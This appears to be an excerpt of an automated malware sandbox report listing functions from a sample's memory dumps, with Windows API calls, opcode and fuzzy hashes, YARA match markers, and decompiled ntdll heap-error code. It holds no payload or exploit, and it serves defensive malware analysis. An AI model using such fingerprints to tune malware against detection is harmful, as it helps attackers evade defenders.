                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                        • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                        • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                        • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407233, Relevance: 1.6, APIs: 1, Instructions: 52threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: dae3e050702505572084c7515291adece590f8ffdea76a93db076fdd068769d7
                                                                        • Instruction ID: 42275ec1bbdd9107008e24805d0d1c1df7da78bfa1576cb43f9b0864f1bdbc18
                                                                        • Opcode Fuzzy Hash: dae3e050702505572084c7515291adece590f8ffdea76a93db076fdd068769d7
                                                                        • Instruction Fuzzy Hash: 4B017D32E4161477D720A9A56C43FFA73589B00B11F5801AFFE0CFB3C1E6696D0582D6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004185D5, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 40c3feda1a0090b62ef2a2e4fc792ab9fdb08d198427710ded3ced6e77b51b31
                                                                        • Instruction ID: 9526831faa348651f2484f90e7168772543a8e34bcaec901cdf911bad1e22b48
                                                                        • Opcode Fuzzy Hash: 40c3feda1a0090b62ef2a2e4fc792ab9fdb08d198427710ded3ced6e77b51b31
                                                                        • Instruction Fuzzy Hash: F2017CB52002086FDB14EF59DC81DEB73A9AF89344F118519FD4897342CA31E811CBB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004072E3, Relevance: 1.5, APIs: 1, Instructions: 48threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 0e510526a822c27e4e5420c908410d0eb3a79bf92e8f0f1666aa0ba59499d36b
                                                                        • Instruction ID: fac4ecfdd03cfaffe3467678bf3474436e2a865f0ca8206eb13de90e01009138
                                                                        • Opcode Fuzzy Hash: 0e510526a822c27e4e5420c908410d0eb3a79bf92e8f0f1666aa0ba59499d36b
                                                                        • Instruction Fuzzy Hash: AAF02831A4162876EB106A809C02FFF76189B40B15F1542AFFE04BE2C2D6BC7D4547EA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 3214013f66299b9ec9659f2cf2444aab677b4a7a88e144fb66d458a9ec8bc226
                                                                        • Instruction ID: bf59ea738fe121061337fae3b95696833655653364d8b0cac5f8001011917114
                                                                        • Opcode Fuzzy Hash: 3214013f66299b9ec9659f2cf2444aab677b4a7a88e144fb66d458a9ec8bc226
                                                                        • Instruction Fuzzy Hash: 10F03075200104AFCB20DF55CCC5EDB776AEF89354F108659F90997346CA35E802CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418502, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 1c4cc6f8cc0e93b3c838202e3c57c0338ed1b98d18bfe31162352ff5644ddf1d
                                                                        • Instruction ID: eccf089e1a1bc705cc3b456848f8173232ab1a7a121b49f52e112349bbe0fbc4
                                                                        • Opcode Fuzzy Hash: 1c4cc6f8cc0e93b3c838202e3c57c0338ed1b98d18bfe31162352ff5644ddf1d
                                                                        • Instruction Fuzzy Hash: 05E0DF34201314BBD320DF54CC81FCB3B589F09644F01845CB9085B242C671AA0086E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0192967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1e900e82c68e766a3bc2d72a701a9f93520991b4f1773a1909416aebada7a2f4
                                                                        • Instruction ID: 6d03cf7c32b9916c122347de86b11622598d43f9cfa442e57990470419eb66c3
                                                                        • Opcode Fuzzy Hash: 1e900e82c68e766a3bc2d72a701a9f93520991b4f1773a1909416aebada7a2f4
                                                                        • Instruction Fuzzy Hash: FDB09B71D015D5C9D611D7A44608717798477D0746F56C061D1060641F4778C095F5F5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 0199B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0199B53F
                                                                        • The instruction at %p tried to %s , xrefs: 0199B4B6
                                                                        • Go determine why that thread has not released the critical section., xrefs: 0199B3C5
                                                                        • an invalid address, %p, xrefs: 0199B4CF
                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0199B305
                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0199B323
                                                                        • <unknown>, xrefs: 0199B27E, 0199B2D1, 0199B350, 0199B399, 0199B417, 0199B48E
                                                                        • *** Inpage error in %ws:%s, xrefs: 0199B418
                                                                        • This failed because of error %Ix., xrefs: 0199B446
                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0199B484
                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0199B352
                                                                        • The instruction at %p referenced memory at %p., xrefs: 0199B432
                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0199B3D6
                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0199B39B
                                                                        • write to, xrefs: 0199B4A6
                                                                        • *** enter .exr %p for the exception record, xrefs: 0199B4F1
                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0199B2DC
                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0199B48F
                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0199B314
                                                                        • *** enter .cxr %p for the context, xrefs: 0199B50D
                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0199B38F
                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0199B476
                                                                        • *** then kb to get the faulting stack, xrefs: 0199B51C
                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0199B2F3
                                                                        • read from, xrefs: 0199B4AD, 0199B4B2
                                                                        • a NULL pointer, xrefs: 0199B4E0
                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0199B47D
                                                                        • The critical section is owned by thread %p., xrefs: 0199B3B9
                                                                        • The resource is owned shared by %d threads, xrefs: 0199B37E
                                                                        • The resource is owned exclusively by thread %p, xrefs: 0199B374
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                        • API String ID: 0-108210295
                                                                        • Opcode ID: 79f56eec9a1813901ac2cf2a04bfd27f4679f00ed21ed3c9b9628197a5900f2a
                                                                        • Instruction ID: 187ecbf06cdf2c6e3e739cf9e7891a9f02aaff3ed9e9abb190d71089d007591d
                                                                        • Opcode Fuzzy Hash: 79f56eec9a1813901ac2cf2a04bfd27f4679f00ed21ed3c9b9628197a5900f2a
                                                                        • Instruction Fuzzy Hash: A3812531B41300FFEF21AA4EAC86D6B3B39EFA6B52F014048F50D9B252D2698601D772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019A1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 44%
                                                                        			E019A1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x18c48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E018EB150();
				} else {
					E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x19d589c);
				E018EB150("Heap error detected at %p (heap handle %p)\n",  *0x19d58a0);
				_t27 =  *0x19d5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M019A1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E018EB150();
				} else {
					E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E018EB150("Error code: %d - %s\n",  *0x19d5898);
				_t113 =  *0x19d58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018EB150();
					} else {
						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018EB150("Parameter1: %p\n",  *0x19d58a4);
				}
				_t115 =  *0x19d58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018EB150();
					} else {
						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018EB150("Parameter2: %p\n",  *0x19d58a8);
				}
				_t117 =  *0x19d58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018EB150();
					} else {
						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018EB150("Parameter3: %p\n",  *0x19d58ac);
				}
				_t119 =  *0x19d58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018EB150();
					} else {
						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x19d58b4);
					E018EB150("Last known valid blocks: before - %p, after - %p\n",  *0x19d58b0);
				} else {
					_t120 =  *0x19d58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E018EB150();
				} else {
					E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E018EB150("Stack trace available at %p\n", 0x19d58c0);
			}











                                                                        0x019a1c10
                                                                        0x019a1c16
                                                                        0x019a1c1e
                                                                        0x019a1c3d
                                                                        0x019a1c3e
                                                                        0x019a1c20
                                                                        0x019a1c35
                                                                        0x019a1c3a
                                                                        0x019a1c44
                                                                        0x019a1c55
                                                                        0x019a1c5a
                                                                        0x019a1c65
                                                                        0x019a1c67
                                                                        0x00000000
                                                                        0x019a1c6e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x019a1c67
                                                                        0x019a1cdc
                                                                        0x019a1ce5
                                                                        0x019a1d04
                                                                        0x019a1d05
                                                                        0x019a1ce7
                                                                        0x019a1cfc
                                                                        0x019a1d01
                                                                        0x019a1d0b
                                                                        0x019a1d17
                                                                        0x019a1d1f
                                                                        0x019a1d25
                                                                        0x019a1d30
                                                                        0x019a1d4f
                                                                        0x019a1d50
                                                                        0x019a1d32
                                                                        0x019a1d47
                                                                        0x019a1d4c
                                                                        0x019a1d61
                                                                        0x019a1d67
                                                                        0x019a1d68
                                                                        0x019a1d6e
                                                                        0x019a1d79
                                                                        0x019a1d98
                                                                        0x019a1d99
                                                                        0x019a1d7b
                                                                        0x019a1d90
                                                                        0x019a1d95
                                                                        0x019a1daa
                                                                        0x019a1db0
                                                                        0x019a1db1
                                                                        0x019a1db7
                                                                        0x019a1dc2
                                                                        0x019a1de1
                                                                        0x019a1de2
                                                                        0x019a1dc4
                                                                        0x019a1dd9
                                                                        0x019a1dde
                                                                        0x019a1df3
                                                                        0x019a1df9
                                                                        0x019a1dfa
                                                                        0x019a1e00
                                                                        0x019a1e0a
                                                                        0x019a1e13
                                                                        0x019a1e32
                                                                        0x019a1e33
                                                                        0x019a1e15
                                                                        0x019a1e2a
                                                                        0x019a1e2f
                                                                        0x019a1e39
                                                                        0x019a1e4a
                                                                        0x019a1e02
                                                                        0x019a1e02
                                                                        0x019a1e08
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x019a1e08
                                                                        0x019a1e5b
                                                                        0x019a1e7a
                                                                        0x019a1e7b
                                                                        0x019a1e5d
                                                                        0x019a1e72
                                                                        0x019a1e77
                                                                        0x019a1e95

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                        • API String ID: 0-2897834094
                                                                        • Opcode ID: 463937bb7d6bb47389da54ac2d48b4ed172b5dd83e8f7e20d12453faec466e24
                                                                        • Instruction ID: 7fc905fe641b585093c078973334c92c78366a21359bf8fbdd098d4ca127e475
                                                                        • Opcode Fuzzy Hash: 463937bb7d6bb47389da54ac2d48b4ed172b5dd83e8f7e20d12453faec466e24
                                                                        • Instruction Fuzzy Hash: A161A432916646DFD211AB49D489D2473F4EB04B71F9A847EF60DDF301D634DA888B8B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 018F3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Kernel-MUI-Number-Allowed, xrefs: 018F3D8C
                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 018F3E97
                                                                        • Kernel-MUI-Language-Allowed, xrefs: 018F3DC0
                                                                        • WindowsExcludedProcs, xrefs: 018F3D6F
                                                                        • Kernel-MUI-Language-SKU, xrefs: 018F3F70
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                        • API String ID: 0-258546922
                                                                        • Opcode ID: c107189b849611e63071afdb5f7ced11b5497bfebe754c6288abcb6939abee79
                                                                        • Instruction ID: f1e5deaad3a4697e17f8bf5f07f3a0d1d2e6abed068e15dd8f5e295b298b1c52
                                                                        • Opcode Fuzzy Hash: c107189b849611e63071afdb5f7ced11b5497bfebe754c6288abcb6939abee79
                                                                        • Instruction Fuzzy Hash: 4BF1F872D00619EBCB15DFD8C980AEEBBB9FF58750F15006AEA05E7251E7359A01CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01918E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrpFindDllActivationContext, xrefs: 01959331, 0195935D
                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0195932A
                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 01959357
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 0195933B, 01959367
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 0-3779518884
                                                                        • Opcode ID: 9f87bb8c14dc25a759baec0779c6b2896feb6753bff3170cb61769c2429fa587
                                                                        • Instruction ID: e035cdfff0b1530630469dbe942d5c09d0c29152b523c2ad295485a4630fc761
                                                                        • Opcode Fuzzy Hash: 9f87bb8c14dc25a759baec0779c6b2896feb6753bff3170cb61769c2429fa587
                                                                        • Instruction Fuzzy Hash: 8E412B31A0031DDEEF36BA1C888DE75BAB8AB0174AF06452DE90C9755AE770BDC093C1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 018F8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrpDoPostSnapWork, xrefs: 01949C1E
                                                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01949C18
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01949C28
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 2994545307-1948996284
                                                                        • Opcode ID: 0bd3615cf86db8f1425639e2e47f5ec60d5743dc7ad5504886da79c84d9fb702
                                                                        • Instruction ID: 115f4ae17fec64627a0ae599477dc7b75d8facf355fe9691fc73f4aa024b213d
                                                                        • Opcode Fuzzy Hash: 0bd3615cf86db8f1425639e2e47f5ec60d5743dc7ad5504886da79c84d9fb702
                                                                        • Instruction Fuzzy Hash: FD910231A1021A9FEB28DF59D480ABABBB5FF86315F15416DDB09EB241D730EA41CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 018F7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 01949891
                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 019498A2
                                                                        • LdrpCompleteMapModule, xrefs: 01949898
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                        • API String ID: 0-1676968949
                                                                        • Opcode ID: b4bc3b9eefd3272cc45dd150a22ae1997f2b5ce56810f99631e5cf0b78890533
                                                                        • Instruction ID: 62ed30e306e25240851a4a8c7c2128eb7f1bb9550f7c99df43b9c0df7a3af753
                                                                        • Opcode Fuzzy Hash: b4bc3b9eefd3272cc45dd150a22ae1997f2b5ce56810f99631e5cf0b78890533
                                                                        • Instruction Fuzzy Hash: CC51DF316007469BF726CF6CC944F2A7BE4AB45B18F1405AEEA55DB3D2D734EA00C751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 018EE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • InstallLanguageFallback, xrefs: 018EE6DB
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 018EE68C
                                                                        • @, xrefs: 018EE6C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
